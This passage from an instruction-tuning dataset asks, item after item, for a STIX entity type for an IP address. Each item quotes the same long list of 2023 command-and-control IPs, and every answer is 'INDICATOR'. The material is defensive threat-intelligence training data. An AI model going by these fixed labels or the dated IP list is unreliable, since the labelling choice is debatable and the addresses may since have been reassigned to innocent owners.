"input": "### Entity:\n206.189.80.216\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n134.122.51.47\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n104.248.86.158\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.76.202.102\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.184.140\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.185.136\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 